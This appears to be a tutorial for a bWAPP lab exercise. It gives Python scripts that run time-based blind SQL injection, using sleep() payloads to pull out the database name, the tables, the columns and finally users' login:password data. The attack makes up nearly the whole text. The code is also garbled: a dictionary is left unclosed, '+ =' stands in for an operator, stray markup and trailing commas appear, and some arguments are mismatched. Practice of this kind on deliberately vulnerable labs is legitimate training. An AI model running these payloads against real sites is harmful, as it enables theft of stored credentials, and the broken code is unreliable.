Complete steps for time blind injection using python script

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  • 1. Get the database name length
  • 2. Get the database name
  • 3. Get the total length of the table name
  • 4. Get the table name
  • 5. Get the total length of the specified table column name
  • 6. Get the column name of the specified table
  • 7. Obtain the total length of data in the specified column of the specified table
  • 8. Obtain the data in the specified column of the specified table

1. Get the database name length

The test environment is bwapp shooting range SQL Injection – Blind – Time-Based

import requests
import time

HEADER={<!-- -->
"Cookie":"BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security=low; PHPSESSID=i79vfbbj4l30k326ckunvitfe5; security_level=0 "

def get_database_name_length(value1, value2):
count = 0
for i in range(100):
url=BASE_URL + "{}=Man of Steel' and length(database())={} and sleep(1) -- {}".format(value1, i, value2)
start_time = time.time()
resp= requests.get(url,headers=HEADER)
if time.time()-start_time>1:
print("The database length is: {}".format(i))
count = i
return count

Execute statement:
databaselen = get_database_name_length(“title”, “ & action=search”) + 1
Results of the

tips:title=, & amp;action=search needs to be obtained by using burp packet capture
– There are spaces on both sides

2. Get database name

def get_database_name(len, value1, value2):
str = ""
for i in range(1,len):
for j in range(127):
url=BASE_URL + "{}=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(2) -- {}".format(value1, i, j, value2 )
start_time = time.time()
resp= requests.get(url,headers=HEADER)
if time.time()-start_time>2:
str + =(chr(j))
print("Database name is:",str)
return str

Execute statement:
database = get_database_name(databaselen,“title”, “ & amp;action=search”)
Results of the

3. Get the total length of the table name

def get_table_name_length(database, value1, value2):
count = 0
for i in range(100):
url=BASE_URL + "{}=Man of Steel' and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'), 1)) ={} and sleep(1) -- { }".format(value1, database,i, value2)
start_time = time.time()
resp= requests.get(url,headers=HEADER)
if time.time()-start_time>1:
print("The total length of the table name is: {}".format(i))
count = i
return count

Execute statement:
tablelen = get_table_name_length(database,“title”, “ & amp;action=search”) + 1
Execution result:

4. Get table name

def get_table_name(len,database, value1, value2):
str = ""
for i in range(1,len):
for j in range(127):
url=BASE_URL + "{}=Man of Steel' and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'),{},1))={} and sleep(2) -- {}".format(value1, database, i,j, value2)
start_time = time.time()
resp= requests.get(url,headers=HEADER)
if time.time()-start_time>2:
str + =(chr(j))
print("Table name:",str)
return str

Execute statement:
get_table_name(tablelen,database,“title”, “ & amp;action=search”)
Results of the:


5. Get the total length of the specified table column name

def get_column_name_length(database,table, value1, value2):
count = 0
for i in range(100):
url=BASE_URL + "{}=Man of Steel' and length(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1)) ={} and sleep(1) -- {}".format(value1, table,database,i, value1)
start_time = time.time()
resp= requests.get(url,headers=HEADER)
if time.time()-start_time>1:
print("The total length of column names is: {}".format(i))
count = i
return count

Execute statement:
columnlen = get_column_name_length(database, “users”, “title”, “ & amp;action=search”) + 1
Results of the:

6. Get the column name of the specified table

def get_column_name(len,database, table, value1, value2):
str = ""
for i in range(1,len):
for j in range(127):
url=BASE_URL + "{}=Man of Steel' and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1),{} ,1))={} and sleep(2) -- {}".format(value1, table, database, i,j, value2)
start_time = time.time()
resp= requests.get(url,headers=HEADER),
if time.time()-start_time>2:
str + =(chr(j))
print("Column name:",str)
return str

Execute statement:
get_column_name(columnlen, database, “users”, “title”, “ & amp;action=search”)
Results of the:

7. Get the total length of data in the specified column of the specified table

def get_data_name_length(table, username, password, value1, value2):
count = 0
for i in range(100):
url=BASE_URL + "{}=Man of Steel' and length(substr((select group_concat({}, ':', {}) from {}), 1)) ={} and sleep(1) -- { }".format(value1, username, password, table,i, value2)
start_time = time.time()
resp= requests.get(url,headers=HEADER)
if time.time()-start_time>1:
print("The total length of column data is: {}".format(i))
count = i
return count

Execute statement:
datalen = get_data_name_length(“users”, “login”, “password”, “title”, “ & amp;action=search”) + 1
Results of the:

8. Get the data in the specified column of the specified table

def get_data_name(len, table, username, password, value1, value2):
str = ""
for i in range(1,len):
for j in range(127):
url=BASE_URL + "{}=Man of Steel' and ascii(substr((select group_concat({}, ':', {}) from {}),{},1))={} and sleep(2) -- {}".format(value1, username, password, table, i,j, value2)
start_time = time.time()
resp= requests.get(url,headers=HEADER),
if time.time()-start_time>2:
str + =(chr(j))
print("Login data is:",str)
return str

Execute statement:
get_data_name(datalen, “users”, “login”, “password”, “title”, “ & amp;action=search”)
Results of the:
We found that using this method seems to be faster and more efficient than burp, but you need to choose the table name yourself starting from column blasting